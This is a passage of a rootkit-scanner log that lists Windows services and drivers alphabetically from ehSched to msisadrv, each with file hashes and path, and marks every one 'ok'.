16:01:56.0252 0x4af4 [ 4705E8EF9934482C5BB488CE28AFC681, 359E9EC5693CE0BE89082E1D5D8F5C5439A5B985010FF0CB45C11E3CFE30637D ] ehSched C:\Windows\ehome\ehsched.exe
16:01:56.0267 0x4af4 ehSched - ok
16:01:56.0361 0x4af4 [ 4CB575D97653FA91FFB02DA3105EB084, 59FB4D2485EEDBCC56D92C1F5DF3FEAE67D751F3AD7AEA7590F3C73107C829E8 ] ekrn C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
16:01:56.0408 0x4af4 ekrn - ok
16:01:56.0439 0x4af4 [ 0E5DA5369A0FCAEA12456DD852545184, 9A64AC5396F978C3B92794EDCE84DCA938E4662868250F8C18FA7C2C172233F8 ] elxstor C:\Windows\system32\drivers\elxstor.sys
16:01:56.0454 0x4af4 elxstor - ok
16:01:56.0470 0x4af4 [ 34A3C54752046E79A126E15C51DB409B, 7D5B5E150C7C73666F99CBAFF759029716C86F16B927E0078D77F8A696616D75 ] ErrDev C:\Windows\system32\drivers\errdev.sys
16:01:56.0470 0x4af4 ErrDev - ok
16:01:56.0517 0x4af4 [ 7029424F0F72B1E9912FA42786ED98A9, 8D70E4302991E0174F0C4658BB793A88DFC121F1858127B903B3E2E01DEECA7F ] ESETOlmarikOlmascoCleaner C:\Windows\system32\Drivers\ESETOlmarikOlmascoCleaner.sys
16:01:56.0532 0x4af4 ESETOlmarikOlmascoCleaner - ok
16:01:56.0564 0x4af4 [ 4166F82BE4D24938977DD1746BE9B8A0, 24121751B7306225AD1C808442D7B030DEF377E9316AA0A3C5C7460E87317881 ] EventSystem C:\Windows\system32\es.dll
16:01:56.0595 0x4af4 EventSystem - ok
16:01:56.0610 0x4af4 [ A510C654EC00C1E9BDD91EEB3A59823B, 76CD277730F7B08D375770CD373D786160F34D1481AF0536BA1A5D2727E255F5 ] exfat C:\Windows\system32\drivers\exfat.sys
16:01:56.0642 0x4af4 exfat - ok
16:01:56.0657 0x4af4 [ 0ADC83218B66A6DB380C330836F3E36D, 798D6F83B5DBCC1656595E0A96CF12087FCCBE19D1982890D0CE5F629B328B29 ] fastfat C:\Windows\system32\drivers\fastfat.sys
16:01:56.0688 0x4af4 fastfat - ok
16:01:56.0735 0x4af4 [ DBEFD454F8318A0EF691FDD2EAAB44EB, 7F52AE222FF28503B6FC4A5852BD0CAEAF187BE69AF4B577D3DE474C24366099 ] Fax C:\Windows\system32\fxssvc.exe
16:01:56.0766 0x4af4 Fax - ok
16:01:56.0766 0x4af4 [ D765D19CD8EF61F650C384F62FAC00AB, 9F0A483A043D3BA873232AD3BA5F7BF9173832550A27AF3E8BD433905BD2A0EE ] fdc C:\Windows\system32\drivers\fdc.sys
16:01:56.0782 0x4af4 fdc - ok
16:01:56.0782 0x4af4 [ 0438CAB2E03F4FB61455A7956026FE86, 6D4DDC2973DB25CE0C7646BC85EFBCC004EBE35EA683F62162AE317C6F1D8DFE ] fdPHost C:\Windows\system32\fdPHost.dll
16:01:56.0813 0x4af4 fdPHost - ok
16:01:56.0813 0x4af4 [ 802496CB59A30349F9A6DD22D6947644, 52D59D3D628D5661F83F090F33F744F6916E0CC1F76E5A33983E06EB66AE19F8 ] FDResPub C:\Windows\system32\fdrespub.dll
16:01:56.0844 0x4af4 FDResPub - ok
16:01:56.0844 0x4af4 [ 655661BE46B5F5F3FD454E2C3095B930, 549C8E2A2A37757E560D55FFA6BFDD838205F17E40561E67F0124C934272CD1A ] FileInfo C:\Windows\system32\drivers\fileinfo.sys
16:01:56.0860 0x4af4 FileInfo - ok
16:01:56.0860 0x4af4 [ 5F671AB5BC87EEA04EC38A6CD5962A47, 6B61D3363FF3F9C439BD51102C284972EAE96ACC0683B9DC7E12D25D0ADC51B6 ] Filetrace C:\Windows\system32\drivers\filetrace.sys
16:01:56.0891 0x4af4 Filetrace - ok
16:01:56.0891 0x4af4 [ C172A0F53008EAEB8EA33FE10E177AF5, 9175A95B323696D1B35C9EFEB7790DD64E6EE0B7021E6C18E2F81009B169D77B ] flpydisk C:\Windows\system32\drivers\flpydisk.sys
16:01:56.0907 0x4af4 flpydisk - ok
16:01:56.0938 0x4af4 [ DA6B67270FD9DB3697B20FCE94950741, F621A4462C9F2904063578C427FAF22D7D66AE9967605C11C798099817CE5331 ] FltMgr C:\Windows\system32\drivers\fltmgr.sys
16:01:56.0969 0x4af4 FltMgr - ok
16:01:57.0032 0x4af4 [ C4C183E6551084039EC862DA1C945E3D, 0874A2ACDD24D64965AA9A76E9C818E216880AE4C9A2E07ED932EE404585CEE6 ] FontCache C:\Windows\system32\FntCache.dll
16:01:57.0063 0x4af4 FontCache - ok
16:01:57.0110 0x4af4 [ A8B7F3818AB65695E3A0BB3279F6DCE6, 89FCF10F599767E67A1E011753E34DA44EAA311F105DBF69549009ED932A60F0 ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
16:01:57.0125 0x4af4 FontCache3.0.0.0 - ok
16:01:57.0156 0x4af4 [ D43703496149971890703B4B1B723EAC, F06397B2EDCA61629249D2EF1CBB7827A8BEAB8488246BD85EF6AE1363C0DA6E ] FsDepends C:\Windows\system32\drivers\FsDepends.sys
16:01:57.0172 0x4af4 FsDepends - ok
16:01:57.0188 0x4af4 [ 6BD9295CC032DD3077C671FCCF579A7B, 83622FBB0CB923798E7E584BF53CAAF75B8C016E3FF7F0FA35880FF34D1DFE33 ] Fs_Rec C:\Windows\system32\drivers\Fs_Rec.sys
16:01:57.0203 0x4af4 Fs_Rec - ok
16:01:57.0234 0x4af4 [ 8F6322049018354F45F05A2FD2D4E5E0, 73BF0FB4EBD7887E992DDEBB79E906958D6678F8D1107E8C368F5A0514D80359 ] fvevol C:\Windows\system32\DRIVERS\fvevol.sys
16:01:57.0266 0x4af4 fvevol - ok
16:01:57.0281 0x4af4 [ 8C778D335C9D272CFD3298AB02ABE3B6, 85F0B13926B0F693FA9E70AA58DE47100E4B6F893772EBE4300C37D9A36E6005 ] gagp30kx C:\Windows\system32\drivers\gagp30kx.sys
16:01:57.0281 0x4af4 gagp30kx - ok
16:01:57.0312 0x4af4 [ 8E98D21EE06192492A5671A6144D092F, B8F656B34D361EA5AFB47F3A67AB2221580DADA59C8CD0CB83181E4AD8B562B4 ] GEARAspiWDM C:\Windows\system32\DRIVERS\GEARAspiWDM.sys
16:01:57.0312 0x4af4 GEARAspiWDM - ok
16:01:57.0359 0x4af4 [ 277BBC7E1AA1EE957F573A10ECA7EF3A, 2EE60B924E583E847CC24E78B401EF95C69DB777A5B74E1EC963E18D47B94D24 ] gpsvc C:\Windows\System32\gpsvc.dll
16:01:57.0390 0x4af4 gpsvc - ok
16:01:57.0390 0x4af4 [ F2523EF6460FC42405B12248338AB2F0, B2F3DE8DE1F512D871BC2BC2E8D0E33AB03335BFBC07627C5F88B65024928E19 ] hcw85cir C:\Windows\system32\drivers\hcw85cir.sys
16:01:57.0406 0x4af4 hcw85cir - ok
16:01:57.0437 0x4af4 [ 975761C778E33CD22498059B91E7373A, 8304E15FBE6876BE57263A03621365DA8C88005EAC532A770303C06799D915D9 ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
16:01:57.0453 0x4af4 HdAudAddService - ok
16:01:57.0468 0x4af4 [ 97BFED39B6B79EB12CDDBFEED51F56BB, 3CF981D668FB2381E52AF2E51E296C6CFB47B0D62249645278479D0111A47955 ] HDAudBus C:\Windows\system32\drivers\HDAudBus.sys
16:01:57.0484 0x4af4 HDAudBus - ok
16:01:57.0500 0x4af4 [ 78E86380454A7B10A5EB255DC44A355F, 11F3ED7ACFFA3024B9BD504F81AC39F5B4CED5A8A425E8BADF7132EFEDB9BD64 ] HidBatt C:\Windows\system32\drivers\HidBatt.sys
16:01:57.0500 0x4af4 HidBatt - ok
16:01:57.0515 0x4af4 [ FDF5EAD19FD8B2D0C50A9CCDD7836F9E, B865703E3D9BFC75DF363BF943213C47A63445415E211000717009D2BD0C062B ] HidBth C:\Windows\system32\drivers\hidbth.sys
16:01:57.0531 0x4af4 HidBth - ok
16:01:57.0546 0x4af4 [ 0A77D29F311B88CFAE3B13F9C1A73825, 8615DC6CEFB591505CE16E054A71A4F371B827DDFD5E980777AB4233DCFDA01D ] HidIr C:\Windows\system32\drivers\hidir.sys
16:01:57.0562 0x4af4 HidIr - ok
16:01:57.0578 0x4af4 [ BD9EB3958F213F96B97B1D897DEE006D, 4D01CBF898B528B3A4E5A683DF2177300AFABD7D4CB51F1A7891B1B545499631 ] hidserv C:\Windows\System32\hidserv.dll
16:01:57.0593 0x4af4 hidserv - ok
16:01:57.0624 0x4af4 [ 9592090A7E2B61CD582B612B6DF70536, FD11D5E02C32D658B28FCC35688AB66CCB5D3A0A0D74C82AE0F0B6C67B568A0F ] HidUsb C:\Windows\system32\drivers\hidusb.sys
16:01:57.0624 0x4af4 HidUsb - ok
16:01:57.0640 0x4af4 [ 387E72E739E15E3D37907A86D9FF98E2, 9935BE2E58788E79328293AF2F202CB0F6042441B176F75ACC5AEA93C8E05531 ] hkmsvc C:\Windows\system32\kmsvc.dll
16:01:57.0671 0x4af4 hkmsvc - ok
16:01:57.0687 0x4af4 [ EFDFB3DD38A4376F93E7985173813ABD, 70402FA73A5A2A8BB557AAC8F531E373077D28DE5F40A1F3F14B940BE01CD2E1 ] HomeGroupListener C:\Windows\system32\ListSvc.dll
16:01:57.0702 0x4af4 HomeGroupListener - ok
16:01:57.0718 0x4af4 [ 908ACB1F594274965A53926B10C81E89, 7D34A742AC486294D82676F8465A3EF26C8AC3317C32B63F62031CB007CFC208 ] HomeGroupProvider C:\Windows\system32\provsvc.dll
16:01:57.0734 0x4af4 HomeGroupProvider - ok
16:01:57.0765 0x4af4 [ 39D2ABCD392F3D8A6DCE7B60AE7B8EFC, E9E6A1665740CFBC2DD321010007EF42ABA2102AEB9772EE8AA3354664B1E205 ] HpSAMD C:\Windows\system32\drivers\HpSAMD.sys
16:01:57.0765 0x4af4 HpSAMD - ok
16:01:57.0780 0x4af4 [ 0EA7DE1ACB728DD5A369FD742D6EEE28, 21C489412EB33A12B22290EB701C19BA57006E8702E76F730954F0784DDE9779 ] HTTP C:\Windows\system32\drivers\HTTP.sys
16:01:57.0812 0x4af4 HTTP - ok
16:01:57.0827 0x4af4 [ A5462BD6884960C9DC85ED49D34FF392, 53E65841AF5B06A2844D0BB6FC4DD3923A323FFA0E4BFC89B3B5CAFB592A3D53 ] hwpolicy C:\Windows\system32\drivers\hwpolicy.sys
16:01:57.0843 0x4af4 hwpolicy - ok
16:01:57.0843 0x4af4 [ FA55C73D4AFFA7EE23AC4BE53B4592D3, 65CDDC62B89A60E942C5642C9D8B539EFB69DA8069B4A2E54978154B314531CD ] i8042prt C:\Windows\system32\drivers\i8042prt.sys
16:01:57.0858 0x4af4 i8042prt - ok
16:01:57.0890 0x4af4 [ D1753C06EE17E29352B065EACF3F10D0, 4DD4C991FAA3CCF99DF8DC9F8F5DEEDEECD55977F0C3AA8C404DEFD21E32A62B ] iaStor C:\Windows\system32\drivers\iaStor.sys
16:01:57.0905 0x4af4 iaStor - ok
16:01:57.0921 0x4af4 [ AAAF44DB3BD0B9D1FB6969B23ECC8366, 805AA4A9464002D1AB3832E4106B2AAA1331F4281367E75956062AAE99699385 ] iaStorV C:\Windows\system32\drivers\iaStorV.sys
16:01:57.0936 0x4af4 iaStorV - ok
16:01:58.0014 0x4af4 [ C98A5B9D932430AD8EEBD3EF73756EF7, DF7E1D391A0F3345AD61154363922C27BD557DEEACE395A6A8A8A16BFD1BB9A8 ] idsvc C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\infocard.exe
16:01:58.0046 0x4af4 idsvc - ok
16:01:58.0046 0x4af4 IEEtwCollectorService - ok
16:01:58.0404 0x4af4 [ 9AA61DC7AA32C1D1260C4267FF07E0C1, 34FEE032C2585600E612A6CFEE33AD4C0C140B04ADB0B08825F2FC5505480366 ] igfx C:\Windows\system32\DRIVERS\igdkmd64.sys
16:01:58.0638 0x4af4 igfx - ok
16:01:58.0701 0x4af4 [ 5C18831C61933628F5BB0EA2675B9D21, 5CD9DE2F8C0256623A417B5C55BF55BB2562BD7AB2C3C83BB3D9886C2FBDA4E4 ] iirsp C:\Windows\system32\drivers\iirsp.sys
16:01:58.0716 0x4af4 iirsp - ok
16:01:58.0779 0x4af4 [ 344789398EC3EE5A4E00C52B31847946, 3DA5F08E4B46F4E63456AA588D49E39A6A09A97D0509880C00F327623DB6122D ] IKEEXT C:\Windows\System32\ikeext.dll
16:01:58.0810 0x4af4 IKEEXT - ok
16:01:58.0888 0x4af4 [ 0043EC20C06FD9FE339B5D37474B731E, E84A078BDBEC7EA29257D758030271B62F3ED2C954DC1EEECC5B24B39EDB2A59 ] Intel(R) Capability Licensing Service Interface c:\Program Files\Intel\iCLS Client\HeciServer.exe
16:01:58.0919 0x4af4 Intel(R) Capability Licensing Service Interface - ok
16:01:58.0997 0x4af4 [ BE421E3E33EE3BD63F0AA99E28CFE258, 11D9FE5012E21CB61F248FC75768BF53F94744D5E7D90763DD2E3F6687559B77 ] Intel(R) ME Service C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
16:01:59.0013 0x4af4 Intel(R) ME Service - ok
16:01:59.0044 0x4af4 [ F00F20E70C6EC3AA366910083A0518AA, E2F3E9FFD82C802C8BAC309893A3664ACF16A279959C0FDECCA64C3D3C60FD22 ] intelide C:\Windows\system32\drivers\intelide.sys
16:01:59.0044 0x4af4 intelide - ok
16:01:59.0075 0x4af4 [ ADA036632C664CAA754079041CF1F8C1, F2386CC09AC6DE4C54189154F7D91C1DB7AA120B13FAE8BA5B579ACF99FCC610 ] intelppm C:\Windows\system32\DRIVERS\intelppm.sys
16:01:59.0091 0x4af4 intelppm - ok
16:01:59.0122 0x4af4 [ 098A91C54546A3B878DAD6A7E90A455B, 044CCE2A0DF56EBE1EFD99B4F6F0A5B9EE12498CA358CF4B2E3A1CFD872823AA ] IPBusEnum C:\Windows\system32\ipbusenum.dll
16:01:59.0153 0x4af4 IPBusEnum - ok
16:01:59.0169 0x4af4 [ C9F0E1BD74365A8771590E9008D22AB6, 728BC5A6AAE499FDC50EB01577AF16D83C2A9F3B09936DD2A89C01E074BA8E51 ] IpFilterDriver C:\Windows\system32\DRIVERS\ipfltdrv.sys
16:01:59.0184 0x4af4 IpFilterDriver - ok
16:01:59.0231 0x4af4 [ 08C2957BB30058E663720C5606885653, E13EDF6701512E2A9977A531454932CA5023087CB50E1D2F416B8BCDD92B67BE ] iphlpsvc C:\Windows\System32\iphlpsvc.dll
16:01:59.0247 0x4af4 iphlpsvc - ok
16:01:59.0262 0x4af4 [ 0FC1AEA580957AA8817B8F305D18CA3A, 7161E4DE91AAFC3FA8BF24FAE4636390C2627DB931505247C0D52C75A31473D9 ] IPMIDRV C:\Windows\system32\drivers\IPMIDrv.sys
16:01:59.0278 0x4af4 IPMIDRV - ok
16:01:59.0278 0x4af4 [ AF9B39A7E7B6CAA203B3862582E9F2D0, 67128BE7EADBE6BD0205B050F96E268948E8660C4BAB259FB0BE03935153D04E ] IPNAT C:\Windows\system32\drivers\ipnat.sys
16:01:59.0309 0x4af4 IPNAT - ok
16:01:59.0356 0x4af4 [ 842D1EDD0F2A6E0E6631BB96BAAA01DE, 9CDD0B99F2C5DAD573A9EA8D5AB2DBFD7A941454CBBA5BFE34E49F2D4EE96A90 ] iPod Service C:\Program Files\iPod\bin\iPodService.exe
16:01:59.0372 0x4af4 iPod Service - ok
16:01:59.0372 0x4af4 [ 3ABF5E7213EB28966D55D58B515D5CE9, A352BCC5B6B9A28805B15CAFB235676F1FAFF0D2394F88C03089EB157D6188AE ] IRENUM C:\Windows\system32\drivers\irenum.sys
16:01:59.0387 0x4af4 IRENUM - ok
16:01:59.0387 0x4af4 [ 2F7B28DC3E1183E5EB418DF55C204F38, D40410A760965925D6F10959B2043F7BD4F68EAFCF5E743AF11AD860BD136548 ] isapnp C:\Windows\system32\drivers\isapnp.sys
16:01:59.0403 0x4af4 isapnp - ok
16:01:59.0434 0x4af4 [ 96BB922A0981BC7432C8CF52B5410FE6, 236C05509B1040059B15021CBBDBDAF3B9C0F00910142BE5887B2C7561BAAFBA ] iScsiPrt C:\Windows\system32\drivers\msiscsi.sys
16:01:59.0434 0x4af4 iScsiPrt - ok
16:01:59.0465 0x4af4 [ 846354992EBB373F452EB9182D501B08, 453459133DCA875E93CAAE9852E652F3794F8C31CE53526C47A181FDBABE6849 ] iusb3hcs C:\Windows\system32\drivers\iusb3hcs.sys
16:01:59.0465 0x4af4 iusb3hcs - ok
16:01:59.0481 0x4af4 [ 1D88A23853387D34D52CC8F9DDBFC56C, D00083B61E93E7E1D247EAB332787912FCF7605AF7043F071238C50E4A15016B ] iusb3hub C:\Windows\system32\DRIVERS\iusb3hub.sys
16:01:59.0496 0x4af4 iusb3hub - ok
16:01:59.0528 0x4af4 [ FC5EFD7C797DF19DFB999F0605A7924E, C56CE3840F3B11D81BED38E5F59ABCA190DFB7127F06263193870312A83379AF ] iusb3xhc C:\Windows\system32\DRIVERS\iusb3xhc.sys
16:01:59.0543 0x4af4 iusb3xhc - ok
16:01:59.0590 0x4af4 [ D4A7FACFDF041069531DC0185879ECF6, 923226F260A54FA6152CA8C1A46848FA9D49CE34F53E64DE143B64099E5E79C0 ] jhi_service C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
16:01:59.0590 0x4af4 jhi_service - ok
16:01:59.0621 0x4af4 [ BC02336F1CBA7DCC7D1213BB588A68A5, 450C5BAD54CCE2AFCDFF1B6E7F8E1A8446D9D3255DF9D36C29A8F848048AAD93 ] kbdclass C:\Windows\system32\DRIVERS\kbdclass.sys
16:01:59.0621 0x4af4 kbdclass - ok
16:01:59.0637 0x4af4 [ 3985332405FA64D8E679A1DB24901596, CA4C274704B9F4AE560CC32AD7C22D39ADAD13C61709E21F70C9B1AACE34B7A2 ] kbdhid C:\Windows\system32\DRIVERS\kbdhid.sys
16:01:59.0637 0x4af4 kbdhid - ok
16:01:59.0652 0x4af4 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] KeyIso C:\Windows\system32\lsass.exe
16:01:59.0652 0x4af4 KeyIso - ok
16:01:59.0699 0x4af4 [ 353009DEDF918B2A51414F330CF72DEC, BF157D6E329F26E02FA16271B751B421396040DBB1D7BF9B2E0A21BC569672E2 ] KSecDD C:\Windows\system32\Drivers\ksecdd.sys
16:01:59.0715 0x4af4 KSecDD - ok
16:01:59.0730 0x4af4 [ 1C2D8E18AA8FD50CD04C15CC27F7F5AB, 4BA3B0F9F01BD47D66091D3AD86B69A523981D61DFB4D677F2CD39405B2DA989 ] KSecPkg C:\Windows\system32\Drivers\ksecpkg.sys
16:01:59.0746 0x4af4 KSecPkg - ok
16:01:59.0746 0x4af4 [ 6869281E78CB31A43E969F06B57347C4, 866A23E69B32A78D378D6CB3B3DA3695FFDFF0FEC3C9F68C8C3F988DF417044B ] ksthunk C:\Windows\system32\drivers\ksthunk.sys
16:01:59.0762 0x4af4 ksthunk - ok
16:01:59.0793 0x4af4 [ 6AB66E16AA859232F64DEB66887A8C9C, 5F2B579BEA8098A2994B0DECECDAE7B396E7B5DC5F09645737B9F28BEEA77FFF ] KtmRm C:\Windows\system32\msdtckrm.dll
16:01:59.0824 0x4af4 KtmRm - ok
16:01:59.0855 0x4af4 [ D9F42719019740BAA6D1C6D536CBDAA6, 8757599D0AE5302C4CE50861BEBA3A8DD14D7B0DBD916FD5404133688CDFCC40 ] LanmanServer C:\Windows\System32\srvsvc.dll
16:01:59.0871 0x4af4 LanmanServer - ok
16:01:59.0902 0x4af4 [ 851A1382EED3E3A7476DB004F4EE3E1A, B1C67F47DD594D092E6E258F01DF5E7150227CE3131A908A244DEE9F8A1FABF9 ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
16:01:59.0918 0x4af4 LanmanWorkstation - ok
16:01:59.0949 0x4af4 [ 02538E602280C07438C94489DCBE77D5, 2E2B60E5FB7A274F4945444D5EDB058E62CAC268C5336FF8F4B9E82245095211 ] libusb0 C:\Windows\system32\DRIVERS\libusb0.sys
16:01:59.0949 0x4af4 libusb0 - ok
16:01:59.0964 0x4af4 [ 1538831CF8AD2979A04C423779465827, E1729B0CC4CEEE494A0B8817A8E98FF232E3A32FB023566EF0BC71A090262C0C ] lltdio C:\Windows\system32\DRIVERS\lltdio.sys
16:01:59.0980 0x4af4 lltdio - ok
16:02:00.0011 0x4af4 [ C1185803384AB3FEED115F79F109427F, 0414FE73532DCAB17E906438A14711E928CECCD5F579255410C62984DD652700 ] lltdsvc C:\Windows\System32\lltdsvc.dll
16:02:00.0042 0x4af4 lltdsvc - ok
16:02:00.0058 0x4af4 [ F993A32249B66C9D622EA5592A8B76B8, EE64672A990C6145DC5601E2B8CDBE089272A72732F59AF9865DCBA8B1717E70 ] lmhosts C:\Windows\System32\lmhsvc.dll
16:02:00.0074 0x4af4 lmhosts - ok
16:02:00.0105 0x4af4 [ EE41A1785162D3C1DB7A574D9BC2019D, CB7A1B10B0B61857B1A3B4C315CF4C3F8C2AB10238EF1018041B7EA33A581DB8 ] LMS C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
16:02:00.0120 0x4af4 LMS - ok
16:02:00.0152 0x4af4 [ 1A93E54EB0ECE102495A51266DCDB6A6, DB6AA86AA36C3A7988BE96E87B5D3251BE7617C54EE8F894D9DC2E267FE3255B ] LSI_FC C:\Windows\system32\drivers\lsi_fc.sys
16:02:00.0167 0x4af4 LSI_FC - ok
16:02:00.0183 0x4af4 [ 1047184A9FDC8BDBFF857175875EE810, F2251EDB7736A26D388A0C5CC2FE5FB9C5E109CBB1E3800993554CB21D81AE4B ] LSI_SAS C:\Windows\system32\drivers\lsi_sas.sys
16:02:00.0198 0x4af4 LSI_SAS - ok
16:02:00.0214 0x4af4 [ 30F5C0DE1EE8B5BC9306C1F0E4A75F93, 88D5740A4E9CC3FA80FA18035DAB441BDC5A039622D666BFDAA525CC9686BD06 ] LSI_SAS2 C:\Windows\system32\drivers\lsi_sas2.sys
16:02:00.0214 0x4af4 LSI_SAS2 - ok
16:02:00.0230 0x4af4 [ 0504EACAFF0D3C8AED161C4B0D369D4A, 4D272237C189646F5C80822FD3CBA7C2728E482E2DAAF7A09C8AEF811C89C54D ] LSI_SCSI C:\Windows\system32\drivers\lsi_scsi.sys
16:02:00.0245 0x4af4 LSI_SCSI - ok
16:02:00.0261 0x4af4 [ 43D0F98E1D56CCDDB0D5254CFF7B356E, 5BA498183B5C4996C694CB0A9A6B66CE6C7A460F6C91BEB9F305486FCC3B7B22 ] luafv C:\Windows\system32\drivers\luafv.sys
16:02:00.0276 0x4af4 luafv - ok
16:02:00.0308 0x4af4 [ 0BE09CD858ABF9DF6ED259D57A1A1663, 2FD28889B93C8E801F74C1D0769673A461671E0189D0A22C94509E3F0EEB7428 ] Mcx2Svc C:\Windows\system32\Mcx2Svc.dll
16:02:00.0308 0x4af4 Mcx2Svc - ok
16:02:00.0323 0x4af4 [ A55805F747C6EDB6A9080D7C633BD0F4, 2DA0E83BF3C8ADEF6F551B6CC1C0A3F6149CDBE6EC60413BA1767C4DE425A728 ] megasas C:\Windows\system32\drivers\megasas.sys
16:02:00.0323 0x4af4 megasas - ok
16:02:00.0339 0x4af4 [ BAF74CE0072480C3B6B7C13B2A94D6B3, 85CBB4949C090A904464F79713A3418338753D20D7FB811E68F287FDAC1DD834 ] MegaSR C:\Windows\system32\drivers\MegaSR.sys
16:02:00.0354 0x4af4 MegaSR - ok
16:02:00.0370 0x4af4 [ 6B01B7414A105B9E51652089A03027CF, 9B113DC22F7D0D0B376E577C6D7083F9EDC09BBFE47726393E16D4FDAAAE21FE ] MEIx64 C:\Windows\system32\drivers\HECIx64.sys
16:02:00.0386 0x4af4 MEIx64 - ok
16:02:00.0417 0x4af4 [ E40E80D0304A73E8D269F7141D77250B, 0DB4AC13A264F19A84DC0BCED54E8E404014CC09C993B172002B1561EC7E265A ] MMCSS C:\Windows\system32\mmcss.dll
16:02:00.0448 0x4af4 MMCSS - ok
16:02:00.0464 0x4af4 [ 800BA92F7010378B09F9ED9270F07137, 94F9AF9E1BE80AE6AC39A2A74EF9FAB115DCAACC011D07DFA8D6A1DDC8A93342 ] Modem C:\Windows\system32\drivers\modem.sys
16:02:00.0479 0x4af4 Modem - ok
16:02:00.0495 0x4af4 [ B03D591DC7DA45ECE20B3B467E6AADAA, 701FB0CAD8138C58507BE28845D3E24CE269A040737C29885944A0D851238732 ] monitor C:\Windows\system32\DRIVERS\monitor.sys
16:02:00.0495 0x4af4 monitor - ok
16:02:00.0510 0x4af4 [ 7D27EA49F3C1F687D357E77A470AEA99, 7FE7CAF95959F127C6D932C01D539C06D80273C49A09761F6E8331C05B1A7EE7 ] mouclass C:\Windows\system32\DRIVERS\mouclass.sys
16:02:00.0510 0x4af4 mouclass - ok
16:02:00.0526 0x4af4 [ D3BF052C40B0C4166D9FD86A4288C1E6, 5E65264354CD94E844BF1838CA1B8E49080EFA34605A32CF2F6A47A2B97FC183 ] mouhid C:\Windows\system32\DRIVERS\mouhid.sys
16:02:00.0542 0x4af4 mouhid - ok
16:02:00.0557 0x4af4 [ 32E7A3D591D671A6DF2DB515A5CBE0FA, 47CED0B9067AE8BF5EEF60B17ADEE5906BEDCC56E4CB460B7BFBC12BB9A69E63 ] mountmgr C:\Windows\system32\drivers\mountmgr.sys
16:02:00.0557 0x4af4 mountmgr - ok
16:02:00.0588 0x4af4 [ 6439D1E559D08BD8A1465A8943357053, 0E300508C22D12FBA3BE566B722F574CBE1B4A1A305356B92B8EA8B86267071B ] MpFilter C:\Windows\system32\DRIVERS\MpFilter.sys
16:02:00.0604 0x4af4 MpFilter - ok
16:02:00.0635 0x4af4 [ A44B420D30BD56E145D6A2BC8768EC58, B1E4DCA5A1008FA7A0492DC091FB2B820406AE13FD3D44F124E89B1037AF09B8 ] mpio C:\Windows\system32\drivers\mpio.sys
16:02:00.0635 0x4af4 mpio - ok
16:02:00.0651 0x4af4 [ 6C38C9E45AE0EA2FA5E551F2ED5E978F, 5A3FA2F110029CB4CC4384998EDB59203FDD65EC45E01B897FB684F8956EAD20 ] mpsdrv C:\Windows\system32\drivers\mpsdrv.sys
16:02:00.0666 0x4af4 mpsdrv - ok
16:02:00.0698 0x4af4 [ 54FFC9C8898113ACE189D4AA7199D2C1, 65F585C87F3F710FD5793FDFA96B740AD8D4317B0C120F4435CCF777300EA4F2 ] MpsSvc C:\Windows\system32\mpssvc.dll
16:02:00.0729 0x4af4 MpsSvc - ok
16:02:00.0776 0x4af4 [ 1A4F75E63C9FB84B85DFFC6B63FD5404, 01AFA6DBB4CDE55FE4EA05BBE8F753A4266F8D072EA1EE01DB79F5126780C21F ] MRxDAV C:\Windows\system32\drivers\mrxdav.sys
16:02:00.0791 0x4af4 MRxDAV - ok
16:02:00.0807 0x4af4 [ A5D9106A73DC88564C825D317CAC68AC, 0457B2AEA4E05A91D0E43F317894A614434D8CEBE35020785387F307E231FBE4 ] mrxsmb C:\Windows\system32\DRIVERS\mrxsmb.sys
16:02:00.0822 0x4af4 mrxsmb - ok
16:02:00.0838 0x4af4 [ D711B3C1D5F42C0C2415687BE09FC163, 9B3013AC60BD2D0FF52086658BA5FF486ADE15954A552D7DD590580E8BAE3EFF ] mrxsmb10 C:\Windows\system32\DRIVERS\mrxsmb10.sys
16:02:00.0854 0x4af4 mrxsmb10 - ok
16:02:00.0869 0x4af4 [ 9423E9D355C8D303E76B8CFBD8A5C30C, 220B33F120C2DD937FE4D5664F4B581DC0ACF78D62EB56B7720888F67B9644CC ] mrxsmb20 C:\Windows\system32\DRIVERS\mrxsmb20.sys
16:02:00.0869 0x4af4 mrxsmb20 - ok
16:02:00.0900 0x4af4 [ C25F0BAFA182CBCA2DD3C851C2E75796, 643E158A0948DF331807AEAA391F23960362E46C0A0CF6D22A99020EAE7B10F8 ] msahci C:\Windows\system32\drivers\msahci.sys
16:02:00.0916 0x4af4 msahci - ok
16:02:00.0916 0x4af4 [ DB801A638D011B9633829EB6F663C900, B34FD33A215ACCF2905F4B7D061686CDB1CB9C652147AF56AE14686C1F6E3C74 ] msdsm C:\Windows\system32\drivers\msdsm.sys
16:02:00.0932 0x4af4 msdsm - ok
16:02:00.0932 0x4af4 [ DE0ECE52236CFA3ED2DBFC03F28253A8, 2FBBEC4CACB5161F68D7C2935852A5888945CA0F107CF8A1C01F4528CE407DE3 ] MSDTC C:\Windows\System32\msdtc.exe
16:02:00.0947 0x4af4 MSDTC - ok
16:02:00.0963 0x4af4 [ AA3FB40E17CE1388FA1BEDAB50EA8F96, 69F93E15536644C8FD679A20190CFE577F4985D3B1B4A4AA250A168615AE1E99 ] Msfs C:\Windows\system32\drivers\Msfs.sys
16:02:00.0978 0x4af4 Msfs - ok
16:02:00.0994 0x4af4 [ F9D215A46A8B9753F61767FA72A20326, 6F76642B45E0A7EF6BCAB8B37D55CCE2EAA310ED07B76D43FCB88987C2174141 ] mshidkmdf C:\Windows\System32\drivers\mshidkmdf.sys
16:02:01.0010 0x4af4 mshidkmdf - ok
16:02:01.0025 0x4af4 [ D916874BBD4F8B07BFB7FA9B3CCAE29D, B229DA150713DEDBC4F05386C9D9DC3BC095A74F44F3081E88311AB73BC992A1 ] msisadrv C:\Windows\system32\drivers\msisadrv.sys
16:02:01.0025 0x4af4 msisadrv - ok
